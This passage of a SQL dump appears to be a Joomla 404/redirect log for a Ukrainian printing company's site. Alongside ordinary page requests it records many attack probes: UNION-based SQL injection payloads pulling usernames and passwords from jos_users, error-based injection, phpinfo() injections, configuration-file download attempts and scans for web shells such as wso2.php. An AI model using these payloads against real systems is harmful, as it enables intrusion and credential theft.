18:16:06','0000-00-00 00:00:00',301),(831,'http://ekvatorprint.com.ua/apple-touch-icon-72x72.png','','','',5,0,'2016-03-09 18:16:07','0000-00-00 00:00:00',301),(832,'http://ekvatorprint.com.ua/index.php/forum/topic/create','','','',8,0,'2016-03-10 05:05:01','0000-00-00 00:00:00',301),(833,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=92','','','',4,0,'2016-03-10 10:03:37','0000-00-00 00:00:00',301),(834,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=94','','','',3,0,'2016-03-10 10:05:10','0000-00-00 00:00:00',301),(835,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=87','','','',3,0,'2016-03-10 10:06:58','0000-00-00 00:00:00',301),(836,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=89','','','',4,0,'2016-03-10 10:07:20','0000-00-00 00:00:00',301),(837,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=93','','','',3,0,'2016-03-10 10:10:22','0000-00-00 00:00:00',301),(838,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=86','','','',4,0,'2016-03-10 10:11:32','0000-00-00 00:00:00',301),(839,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=95','','','',4,0,'2016-03-10 10:11:58','0000-00-00 00:00:00',301),(840,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=88','','','',4,0,'2016-03-10 10:14:20','0000-00-00 00:00:00',301),(841,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=90','','','',3,0,'2016-03-10 10:14:30','0000-00-00 00:00:00',301),(842,'http://ekvatorprint.com.ua/?option=com_user&view=login','','','',1,0,'2016-03-10 15:46:46','0000-00-00 00:00:00',301),(843,'http://ekvatorprint.com.ua/reestr/reestr-id128032.php?roskomnadzor=phpinfo();','','','',1,0,'2016-03-12 16:58:40','0000-00-00 00:00:00',301),(844,'http://ekvatorprint.com.ua/reestr-id128032.php?roskomnadzor=phpinfo();','','','',1,0,'2016-03-12 16:58:40','0000-00-00 00:00:00',301),(845,'http://ekvatorprint.com.ua/reestr-id198617.php?roskomnadzor=phpinfo();','','','',1,0,'2016-03-12 16:58:40','0000-00-00 00:00:00',301),(846,'http://ekvatorprint.com.ua/reestr/reestr-id198617.php?roskomnadzor=phpinfo();','','','',1,0,'2016-03-12 16:58:40','0000-00-00 00:00:00',301),(847,'http://ekvatorprint.com.ua/engine/classes/min/index.php?f=engine/data/dbconfig.php\0.js','','','',1,0,'2016-03-12 22:18:31','0000-00-00 00:00:00',301),(848,'http://ekvatorprint.com.ua/wp-content/plugins/revslider/temp/update_extract/wpfoot2.php','','http://www.googlebot.com/bot.html','',1,0,'2016-03-14 06:13:10','0000-00-00 00:00:00',301),(849,'http://ekvatorprint.com.ua/uploadify/uploadify.php?folder=/','','http://ekvatorprint.com.ua/uploadify/uploadify.php?folder=/','',3,0,'2016-03-14 06:13:10','0000-00-00 00:00:00',301),(850,'http://ekvatorprint.com.ua/wpfoot2.php','','http://www.googlebot.com/bot.html','',1,0,'2016-03-14 06:13:11','0000-00-00 00:00:00',301),(851,'http://ekvatorprint.com.ua/tiny_mce/plugins/tinybrowser/upload.php?type=file','','','',2,0,'2016-03-14 06:13:15','0000-00-00 00:00:00',301),(852,'http://ekvatorprint.com.ua/tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass=','','http://ekvatorprint.com.ua/tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass=','',2,0,'2016-03-14 06:13:16','0000-00-00 00:00:00',301),(853,'http://ekvatorprint.com.ua/wpfoot2.php.suspected_','','http://www.googlebot.com/bot.html','',1,0,'2016-03-14 06:13:16','0000-00-00 00:00:00',301),(854,'http://ekvatorprint.com.ua/sites/all/libraries/elfinder/php/connector.minimal.php','','http://ekvatorprint.com.ua/sites/all/libraries/elfinder/php/connector.minimal.php','',10,0,'2016-03-14 06:13:16','0000-00-00 00:00:00',301),(855,'http://ekvatorprint.com.ua/sites/all/libraries/elfinder/files/wpfoot2.php','','http://www.googlebot.com/bot.html','',1,0,'2016-03-14 06:13:16','0000-00-00 00:00:00',301),(856,'http://ekvatorprint.com.ua/xmlrpc.php?rsd','','','',4,0,'2016-03-15 08:56:44','0000-00-00 00:00:00',301),(857,'http://ekvatorprint.com.ua/blog/robots.txt','','','',224,0,'2016-03-15 08:56:44','0000-00-00 00:00:00',301),(858,'http://ekvatorprint.com.ua/blog/','','','',249,0,'2016-03-15 08:56:44','0000-00-00 00:00:00',301),(859,'http://ekvatorprint.com.ua/wordpress/','','','',231,0,'2016-03-15 08:56:45','0000-00-00 00:00:00',301),(860,'http://ekvatorprint.com.ua/wp/','','','',230,0,'2016-03-15 08:56:45','0000-00-00 00:00:00',301),(861,'http://ekvatorprint.com.ua/includes/tmp.php','','','',3,0,'2016-03-15 09:11:17','0000-00-00 00:00:00',301),(862,'http://ekvatorprint.com.ua/plugins/captcha/jproicaptcha/jproicaptcha.php','','','',5,0,'2016-03-16 01:37:02','0000-00-00 00:00:00',301),(863,'http://ekvatorprint.com.ua/administrator/components/com_bt_portfolio/helpers/uploadify/swfobject.js','','','',1,0,'2016-03-16 17:00:57','0000-00-00 00:00:00',301),(864,'http://ekvatorprint.com.ua/components/com_jdownloads/jdownloads.js','','','',3,0,'2016-03-16 17:39:36','0000-00-00 00:00:00',301),(865,'http://ekvatorprint.com.ua/modules/mod_ariimagesliderer/mod_ariimagesliderer.php','','','',1,0,'2016-03-18 00:53:38','0000-00-00 00:00:00',301),(866,'http://ekvatorprint.com.ua/pr','','','',5,0,'2016-03-18 07:57:44','0000-00-00 00:00:00',301),(867,'http://www.ekvatorprint.com.ua/index.php?option=com_easyblog&view=dashboard&layout=write','','http://www.ekvatorprint.com.ua/','',1,0,'2016-03-19 08:58:43','0000-00-00 00:00:00',301),(868,'http://ekvatorprint.com.ua/admin/','','','',28,0,'2016-03-20 07:32:00','0000-00-00 00:00:00',301),(869,'http://ekvatorprint.com.ua/user/','','','',17,0,'2016-03-20 07:33:31','0000-00-00 00:00:00',301),(870,'http://ekvatorprint.com.ua/components/com_creativecontactform/assets/js/creativecontactform.js','','','',1,0,'2016-03-20 15:46:35','0000-00-00 00:00:00',301),(871,'http://ekvatorprint.com.ua/index.php/component/\'\"/lostpassword','','http://www.google.com/','',2,0,'2016-03-21 15:04:44','0000-00-00 00:00:00',301),(872,'http://ekvatorprint.com.ua/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10+from+jos_users+where+gid=24+limit+0,1--','','','',3,0,'2016-03-22 14:04:39','0000-00-00 00:00:00',301),(873,'http://ekvatorprint.com.ua/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10+from+jos_users+where+gid=25+limit+0,1--','','','',3,0,'2016-03-22 14:04:42','0000-00-00 00:00:00',301),(874,'http://ekvatorprint.com.ua/components/com_easy_youtube_gallery/assest/css/style.css','','http://ekvatorprint.com.ua/components/com_easy_youtube_gallery/assest/css/style.css','',1,0,'2016-03-23 21:10:50','0000-00-00 00:00:00',301),(875,'http://ekvatorprint.com.ua/images/phocagallery/bannera/banner-printing_sport-hall.jpg','','','',1,0,'2016-03-25 16:58:41','0000-00-00 00:00:00',301),(876,'http://ekvatorprint.com.ua/images/phocagallery/bannera/banner-1.jpg','','','',1,0,'2016-03-25 16:58:41','0000-00-00 00:00:00',301),(877,'http://ekvatorprint.com.ua/images/phocagallery/bannera/banner-2.jpg','','','',1,0,'2016-03-25 16:58:41','0000-00-00 00:00:00',301),(878,'http://ekvatorprint.com.ua/images/phocagallery/bannera/banner-3.jpg','','','',1,0,'2016-03-25 16:58:42','0000-00-00 00:00:00',301),(879,'http://ekvatorprint.com.ua/images/phocagallery/bannera/banner-4.jpg','','','',1,0,'2016-03-25 16:58:42','0000-00-00 00:00:00',301),(880,'http://ekvatorprint.com.ua/images/phocagallery/bannera/banner-7.jpg','','','',1,0,'2016-03-25 16:58:42','0000-00-00 00:00:00',301),(881,'http://ekvatorprint.com.ua/images/phocagallery/bannera/banner-5.jpg','','','',1,0,'2016-03-25 16:58:42','0000-00-00 00:00:00',301),(882,'http://ekvatorprint.com.ua/images/phocagallery/bannera/banner-10.jpg','','','',1,0,'2016-03-25 16:58:42','0000-00-00 00:00:00',301),(883,'http://ekvatorprint.com.ua/images/phocagallery/bannera/banner-13.jpg','','','',1,0,'2016-03-25 16:58:42','0000-00-00 00:00:00',301),(884,'http://ekvatorprint.com.ua/components/com_content/helpers/user.php','','','',2,0,'2016-03-29 03:21:46','0000-00-00 00:00:00',301),(885,'http://ekvatorprint.com.ua/contact.html','','','',2,0,'2016-03-29 10:27:56','0000-00-00 00:00:00',301),(886,'http://ekvatorprint.com.ua/contact.asp','','','',2,0,'2016-03-29 10:27:56','0000-00-00 00:00:00',301),(887,'http://ekvatorprint.com.ua/contact.htm','','','',2,0,'2016-03-29 10:27:56','0000-00-00 00:00:00',301),(888,'http://ekvatorprint.com.ua/contact.aspx','','','',2,0,'2016-03-29 10:27:56','0000-00-00 00:00:00',301),(889,'http://ekvatorprint.com.ua/contact.php','','','',2,0,'2016-03-29 10:27:57','0000-00-00 00:00:00',301),(890,'http://ekvatorprint.com.ua/main.htm','','','',1,0,'2016-03-29 10:27:57','0000-00-00 00:00:00',301),(891,'http://ekvatorprint.com.ua/main.html','','','',2,0,'2016-03-29 10:27:57','0000-00-00 00:00:00',301),(892,'http://ekvatorprint.com.ua/main.asp','','','',2,0,'2016-03-29 10:27:57','0000-00-00 00:00:00',301),(893,'http://ekvatorprint.com.ua/main.aspx','','','',1,0,'2016-03-29 10:27:57','0000-00-00 00:00:00',301),(894,'http://ekvatorprint.com.ua/main.php','','','',3,0,'2016-03-29 10:27:57','0000-00-00 00:00:00',301),(895,'http://ekvatorprint.com.ua/main.jsp','','','',2,0,'2016-03-29 10:28:00','0000-00-00 00:00:00',301),(896,'http://ekvatorprint.com.ua/sergeywasp','','','',1,0,'2016-03-30 06:45:18','0000-00-00 00:00:00',301),(897,'http://ekvatorprint.com.ua/jfhjkdshfdsfkjhdjfdjfhjskdhfeuwfewifhhdfjkfhkdjhfsdjkfhdjkfhdkfhdfhk','','','',172,0,'2016-03-30 13:35:49','0000-00-00 00:00:00',301),(898,'http://ekvatorprint.com.ua/sitemap.txt','','http://ekvatorprint.com.ua/sitemap.xml','',249,0,'2016-03-30 13:35:57','0000-00-00 00:00:00',301),(899,'http://ekvatorprint.com.ua/sitemap_index.xml','','http://ekvatorprint.com.ua/sitemap.txt','',180,0,'2016-03-30 13:35:57','0000-00-00 00:00:00',301),(900,'http://ekvatorprint.com.ua/administrator/components/com_phocagallery/assets/jcp/picker.js','','http://ekvatorprint.com.ua/administrator/index.php?option=com_phocagallery&view=phocagalleryt','',6,0,'2016-03-31 08:41:57','0000-00-00 00:00:00',301),(901,'http://ekvatorprint.com.ua/portfolio','','','',873,0,'2016-03-31 09:55:15','0000-00-00 00:00:00',301),(902,'http://ekvatorprint.com.ua/portfolio/category/5-setki','','','',184,0,'2016-03-31 10:28:07','0000-00-00 00:00:00',301),(903,'http://ekvatorprint.com.ua/portfolio/category/7-bumaga-bluback','','','',137,0,'2016-03-31 10:28:08','0000-00-00 00:00:00',301),(904,'http://ekvatorprint.com.ua/portfolio/category/2-banners','','','',182,0,'2016-03-31 10:28:12','0000-00-00 00:00:00',301),(905,'http://ekvatorprint.com.ua/portfolio/category/6-fotooboi','','','',137,0,'2016-03-31 10:28:14','0000-00-00 00:00:00',301),(906,'http://ekvatorprint.com.ua/portfolio/category/4-plenki','','','',153,0,'2016-03-31 10:28:15','0000-00-00 00:00:00',301),(907,'http://ekvatorprint.com.ua/portfolio/category/8-kartini-na-holste','','','',92,0,'2016-03-31 10:28:32','0000-00-00 00:00:00',301),(908,'http://ekvatorprint.com.ua/portfolio/category/3-citylights','','','',137,0,'2016-03-31 10:28:35','0000-00-00 00:00:00',301),(909,'http://ekvatorprint.com.ua/components/com_jnews/includes/tabpane.js','','http://ekvatorprint.com.ua/components/com_jnews/includes/tabpane.js','',1,0,'2016-03-31 18:32:44','0000-00-00 00:00:00',301),(910,'http://ekvatorprint.com.ua/index.php?option=com_cckjseblod&task=download&file=configuration.php','','','',7,0,'2016-04-01 06:13:25','0000-00-00 00:00:00',301),(911,'http://ekvatorprint.com.ua/delivery','','','',15,0,'2016-04-01 08:52:48','0000-00-00 00:00:00',301),(912,'http://ekvatorprint.com.ua/trebovaniya','','','',15,0,'2016-04-01 08:54:51','0000-00-00 00:00:00',301),(913,'http://www.ekvatorprint.com.ua/images/xxu.php','','','',1,0,'2016-04-02 20:06:56','0000-00-00 00:00:00',301),(914,'http://ekvatorprint.com.ua/components/com_myblog/js/myblog.js','','','',1,0,'2016-04-03 17:04:42','0000-00-00 00:00:00',301),(915,'http://ekvatorprint.com.ua/a','','','',2,0,'2016-04-05 13:07:06','0000-00-00 00:00:00',301),(916,'http://ekvatorprint.com.ua/administrator/components/com_extplorer/style/opacity.js','','','',1,0,'2016-04-05 17:19:31','0000-00-00 00:00:00',301),(917,'http://ekvatorprint.com.ua/apple-app-site-association','','','',8,0,'2016-04-06 06:09:47','0000-00-00 00:00:00',301),(918,'http://ekvatorprint.com.ua/print-ceilings','','http://ekvatorprint.com.ua/galereya-kartin','',291,0,'2016-04-06 13:13:18','0000-00-00 00:00:00',301),(919,'http://ekvatorprint.com.ua/far.php?pass=Dr57fd','','','',3,0,'2016-04-06 16:17:06','0000-00-00 00:00:00',301),(920,'http://ekvatorprint.com.ua/administrator/administrator/cache/index.html','','','',1,0,'2016-04-06 16:34:23','0000-00-00 00:00:00',301),(921,'http://ekvatorprint.com.ua/replace.php','','','',2,0,'2016-04-06 21:45:51','0000-00-00 00:00:00',301),(922,'http://ekvatorprint.com.ua/print-billboards505*5','','','',1,0,'2016-04-07 20:42:32','0000-00-00 00:00:00',301),(923,'http://ekvatorprint.com.ua/testyou.php','','','',1,0,'2016-04-07 23:16:45','0000-00-00 00:00:00',301),(924,'http://ekvatorprint.com.ua/index.php?view=registration','','','',25,0,'2016-04-09 01:39:53','0000-00-00 00:00:00',301),(925,'http://ekvatorprint.com.ua/index.php?view=remind','','','',25,0,'2016-04-09 01:39:56','0000-00-00 00:00:00',301),(926,'http://ekvatorprint.com.ua/index.php?view=reset','','','',32,0,'2016-04-09 01:40:01','0000-00-00 00:00:00',301),(927,'http://ekvatorprint.com.ua/images/modulnie','','','',10,0,'2016-04-09 03:48:35','0000-00-00 00:00:00',301),(928,'http://ekvatorprint.com.ua/?option=com_content&view=frontpage','','','',3,0,'2016-04-11 11:01:24','0000-00-00 00:00:00',301),(929,'http://ekvatorprint.com.ua/price Экватор','','','',1,0,'2016-04-11 17:35:47','0000-00-00 00:00:00',301),(930,'http://ekvatorprint.com.ua/.php','','','',1,0,'2016-04-15 09:28:14','0000-00-00 00:00:00',301),(931,'http://ekvatorprint.com.ua/administrator/components/com_xcloner-backupandrestore/','','','',1,0,'2016-04-17 02:11:08','0000-00-00 00:00:00',301),(932,'http://ekvatorprint.com.ua/media/com_fabrik/js/fabrik.js','','','',1,0,'2016-04-17 17:54:26','0000-00-00 00:00:00',301),(933,'http://ekvatorprint.com.ua/plugins/content/jw_sig/jw_sig/includes/js/behaviour.js','','','',1,0,'2016-04-17 18:02:57','0000-00-00 00:00:00',301),(934,'http://ekvatorprint.com.ua/robots-ssl.txt','','','',1,0,'2016-04-19 09:11:48','0000-00-00 00:00:00',301),(935,'http://ekvatorprint.com.ua/rpbpts.txt','','','',1,0,'2016-04-19 10:08:21','0000-00-00 00:00:00',301),(936,'http://ekvatorprint.com.ua/robpts.txt','','','',1,0,'2016-04-19 10:08:26','0000-00-00 00:00:00',301),(937,'http://ekvatorprint.com.ua/robot.txt','','','',2,0,'2016-04-19 13:47:42','0000-00-00 00:00:00',301),(938,'http://ekvatorprint.com.ua/robots.txt\'','','','',1,0,'2016-04-19 13:48:13','0000-00-00 00:00:00',301),(939,'http://ekvatorprint.com.ua/component/content/images/stories/petx.php?baca','','','',2,0,'2016-04-20 22:13:25','0000-00-00 00:00:00',301),(940,'http://ekvatorprint.com.ua/component/content/images/stories/explore.php?baca','','','',2,0,'2016-04-20 22:13:27','0000-00-00 00:00:00',301),(941,'http://ekvatorprint.com.ua/component/content/images/stories/magic.php.png','','','',1,0,'2016-04-20 22:13:47','0000-00-00 00:00:00',301),(942,'http://ekvatorprint.com.ua/component/content/images/stories/magic.php.png?baca','','','',1,0,'2016-04-20 22:13:48','0000-00-00 00:00:00',301),(943,'http://ekvatorprint.com.ua/modules/mod_ariimageslider/mod_ariimageslider.php','','','',6,0,'2016-04-21 03:19:33','0000-00-00 00:00:00',301),(944,'http://ekvatorprint.com.ua/modules/mod_araticlhess1/mod_araticlhess1.php','','','',5,0,'2016-04-21 03:19:35','0000-00-00 00:00:00',301),(945,'http://ekvatorprint.com.ua/images/maink.php','','','',22,0,'2016-04-21 03:19:35','0000-00-00 00:00:00',301),(946,'http://ekvatorprint.com.ua/images/images.php','','','',3,0,'2016-04-21 03:19:35','0000-00-00 00:00:00',301),(947,'http://ekvatorprint.com.ua/templates/beez/index.php','','','',53,0,'2016-04-21 03:19:35','0000-00-00 00:00:00',301),(948,'http://ekvatorprint.com.ua/tmp/wso2.php','','','',1,0,'2016-04-21 03:19:36','0000-00-00 00:00:00',301),(949,'http://ekvatorprint.com.ua/tmp/tmp.php','','','',5,0,'2016-04-21 03:19:37','0000-00-00 00:00:00',301),(950,'http://ekvatorprint.com.ua/tmp/404.php','','','',1,0,'2016-04-21 03:19:37','0000-00-00 00:00:00',301),(951,'http://ekvatorprint.com.ua/images/wso2.php','','','',1,0,'2016-04-21 03:19:38','0000-00-00 00:00:00',301),(952,'http://ekvatorprint.com.ua/googled6984e464fa0f140.html','','','',1,0,'2016-04-21 11:18:53','0000-00-00 00:00:00',301),(953,'http://ekvatorprint.com.ua/plugin.php','','','',7,0,'2016-04-22 02:58:51','0000-00-00 00:00:00',301),(954,'http://ekvatorprint.com.ua/.svn/entries','','','',5,0,'2016-04-22 14:59:48','0000-00-00 00:00:00',301),(955,'http://ekvatorprint.com.ua/.git/config','','','',24,0,'2016-04-22 14:59:48','0000-00-00 00:00:00',301),(956,'http://ekvatorprint.com.ua/ali.txt','','','',1,0,'2016-04-22 14:59:48','0000-00-00 00:00:00',301),(957,'http://ekvatorprint.com.ua/index.php?option=com_jetext&task=download&file=[../../index.php]','','','',3,0,'2016-04-22 14:59:50','0000-00-00 00:00:00',301),(958,'http://ekvatorprint.com.ua/index.php/weblinks-categories?id=0 ) union select md5(3.1415)-- )','','','',3,0,'2016-04-22 14:59:50','0000-00-00 00:00:00',301),(959,'http://ekvatorprint.com.ua/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null\'+/*!50000UnIoN*/+/*!50000SeLeCt*/md5(3.1415),222-- -','','','',3,0,'2016-04-22 14:59:51','0000-00-00 00:00:00',301),(960,'http://ekvatorprint.com.ua/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999+UNION+SELECT+md5(3.1415)--','','','',3,0,'2016-04-22 14:59:51','0000-00-00 00:00:00',301),(961,'http://ekvatorprint.com.ua/index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=com_enmasse&sortBy=117 and(select 1 from(select count(*),concat((select (select (select mid(md5(3.1415),1,16)) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1','','','',3,0,'2016-04-22 14:59:51','0000-00-00 00:00:00',301),(962,'http://ekvatorprint.com.ua/index.php?option=com_vnmshop&catid=113 LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5(3.1415),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL','','','',3,0,'2016-04-22 14:59:51','0000-00-00 00:00:00',301),(963,'http://ekvatorprint.com.ua/index.php?option=com_job&controller=listcategory&task=viewJob&id_job=-1+UNION+ALL+SELECT+1,md5(3.1415),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42--','','','',3,0,'2016-04-22 14:59:52','0000-00-00 00:00:00',301),(964,'http://ekvatorprint.com.ua/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24\" and 1=0 union select 1,2,3,4,5,6,7,8,md5(3.1415),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63#&cmd=add&cid=20&sid=0.6886686905513422','','','',3,0,'2016-04-22 14:59:52','0000-00-00 00:00:00',301),(965,'http://ekvatorprint.com.ua/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594+union+select+111,222,MD5(3.1415),444,555,666,777,888,999--+AbuHassan','','','',3,0,'2016-04-22 14:59:52','0000-00-00 00:00:00',301),(966,'http://ekvatorprint.com.ua/index.php?option=com_ebcontent&view=article&tmpl=component&id=MD5(3.1415)&cid=9&print=','','','',4,0,'2016-04-22 14:59:52','0000-00-00 00:00:00',301),(967,'http://ekvatorprint.com.ua/components/com_weblinks/models/setup.php','','','',8,0,'2016-04-22 18:43:45','0000-00-00 00:00:00',301),(968,'http://ekvatorprint.com.ua/libraries/joomla/string/pclass.php','','','',1,0,'2016-04-22 18:56:15','0000-00-00 00:00:00',301),(969,'http://ekvatorprint.com.ua/libraries/simplepie/mod_ariimagespas.php','','','',1,0,'2016-04-22 18:57:53','0000-00-00 00:00:00',301),(970,'http://ekvatorprint.com.ua/com_loader.php','','','',1,0,'2016-04-23 00:51:10','0000-00-00 00:00:00',301),(971,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-96.png','','','',2,0,'2016-04-23 14:43:54','0000-00-00 00:00:00',301),(972,'http://ekvatorprint.com.ua/sql_dump.php','','http://www.googlebot.com/bot.html','',1,0,'2016-04-25 17:53:01','0000-00-00 00:00:00',301),(973,'http://ekvatorprint.com.ua/index.php?id=article','','','',9,0,'2016-04-26 03:14:20','0000-00-00 00:00:00',301),(974,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/','','http://ekvatorprint.com.ua/modulnye-kartiny?yclid=2203500043955867831','',630,0,'2016-04-26 06:54:48','0000-00-00 00:00:00',301),(975,'http://ekvatorprint.com.ua/images/modulnie kartini/','','http://ekvatorprint.com.ua/modulnye-kartiny','',2,0,'2016-04-26 06:57:44','0000-00-00 00:00:00',301),(976,'http://ekvatorprint.com.ua/img/iframe.png','','http://ekvatorprint.com.ua/','',10,0,'2016-04-26 10:52:29','0000-00-00 00:00:00',301),(977,'http://ekvatorprint.com.ua/libraries/joomla/filter/wp-error.php','','http://ekvatorprint.com.ua/libraries/joomla/filter/wp-error.php','',1,0,'2016-04-26 16:52:56','0000-00-00 00:00:00',301),(978,'http://ekvatorprint.com.ua/plugins/system/languagecode/language/main.php','','http://ekvatorprint.com.ua/plugins/system/languagecode/language/main.php','',1,0,'2016-04-26 16:52:56','0000-00-00 00:00:00',301),(979,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/img/main.php','','http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/img/main.php','',1,0,'2016-04-26 16:52:56','0000-00-00 00:00:00',301),(980,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/main.php','','http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/main.php','',1,0,'2016-04-26 16:52:56','0000-00-00 00:00:00',301),(981,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/main.path.php','','http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/main.path.php','',1,0,'2016-04-26 16:52:57','0000-00-00 00:00:00',301),(982,'http://ekvatorprint.com.ua/modules/mod_k2_tools/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_k2_tools/dispacher.php','',1,0,'2016-04-26 16:52:57','0000-00-00 00:00:00',301),(983,'http://ekvatorprint.com.ua/modules/mod_widgetkit/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_widgetkit/dispacher.php','',1,0,'2016-04-26 16:52:57','0000-00-00 00:00:00',301),(984,'http://ekvatorprint.com.ua/modules/mod_tools/mod_tools.php','','http://ekvatorprint.com.ua/modules/mod_tools/mod_tools.php','',2,0,'2016-04-26 16:52:57','0000-00-00 00:00:00',301),(985,'http://ekvatorprint.com.ua/modules/mod_k2_user/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_k2_user/dispacher.php','',1,0,'2016-04-26 16:52:57','0000-00-00 00:00:00',301),(986,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/images.php','','http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/images.php','',1,0,'2016-04-26 16:52:57','0000-00-00 00:00:00',301),(987,'http://ekvatorprint.com.ua/plugins/quickicon/wp-xmlrpc.php','','http://ekvatorprint.com.ua/plugins/quickicon/wp-xmlrpc.php','',1,0,'2016-04-26 16:52:57','0000-00-00 00:00:00',301),(988,'http://ekvatorprint.com.ua/modules/mod_articles_popular/wp-xmlrpc.php','','http://ekvatorprint.com.ua/modules/mod_articles_popular/wp-xmlrpc.php','',1,0,'2016-04-26 16:52:57','0000-00-00 00:00:00',301),(989,'http://ekvatorprint.com.ua/media/mailto/wp-xmlrpc.php','','http://ekvatorprint.com.ua/media/mailto/wp-xmlrpc.php','',1,0,'2016-04-26 16:52:57','0000-00-00 00:00:00',301),(990,'http://ekvatorprint.com.ua/images/banners/wpconfig-new.php','','http://ekvatorprint.com.ua/images/banners/wpconfig-new.php','',1,0,'2016-04-26 16:52:57','0000-00-00 00:00:00',301),(991,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/thumbs.php','','http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/thumbs.php','',1,0,'2016-04-26 16:52:58','0000-00-00 00:00:00',301),(992,'http://ekvatorprint.com.ua/administrator/language/wp-xmlrpc.php','','http://ekvatorprint.com.ua/administrator/language/wp-xmlrpc.php','',1,0,'2016-04-26 17:15:13','0000-00-00 00:00:00',301),(993,'http://ekvatorprint.com.ua/administrator/modules/wp-xmlrpc.php','','http://ekvatorprint.com.ua/administrator/modules/wp-xmlrpc.php','',1,0,'2016-04-26 17:15:14','0000-00-00 00:00:00',301),(994,'http://ekvatorprint.com.ua/administrator/components/com_languages/views/installed/thumbs.php','','http://ekvatorprint.com.ua/administrator/components/com_languages/views/installed/thumbs.php','',1,0,'2016-04-26 17:15:14','0000-00-00 00:00:00',301),(995,'http://ekvatorprint.com.ua/administrator/components/com_templates/views/style/thumbs.php','','http://ekvatorprint.com.ua/administrator/components/com_templates/views/style/thumbs.php','',1,0,'2016-04-26 17:15:14','0000-00-00 00:00:00',301),(996,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/iespell/shtml.php','','http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/iespell/shtml.php','',1,0,'2016-04-26 17:15:36','0000-00-00 00:00:00',301),(997,'http://ekvatorprint.com.ua/language/overrides/wp-xmlrpc.php','','http://ekvatorprint.com.ua/language/overrides/wp-xmlrpc.php','',1,0,'2016-04-26 17:15:36','0000-00-00 00:00:00',301),(998,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/preview/thumbs.php','','http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/preview/thumbs.php','',1,0,'2016-04-26 17:15:37','0000-00-00 00:00:00',301),(999,'http://ekvatorprint.com.ua/images/picture.php','','http://ekvatorprint.com.ua/images/picture.php','',1,0,'2016-04-26 17:15:37','0000-00-00 00:00:00',301),(1000,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/print/shtml.php','','http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/print/shtml.php','',1,0,'2016-04-26 17:15:37','0000-00-00 00:00:00',301),(1001,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/table/thumbs.php','','http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/table/thumbs.php','',1,0,'2016-04-26 17:15:37','0000-00-00 00:00:00',301),(1002,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/template/js/main.php','','http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/template/js/main.php','',1,0,'2016-04-26 17:15:37','0000-00-00 00:00:00',301),(1003,'http://ekvatorprint.com.ua/media/com_joomlaupdate/wp-xmlrpc.php','','http://ekvatorprint.com.ua/media/com_joomlaupdate/wp-xmlrpc.php','',1,0,'2016-04-26 17:15:37','0000-00-00 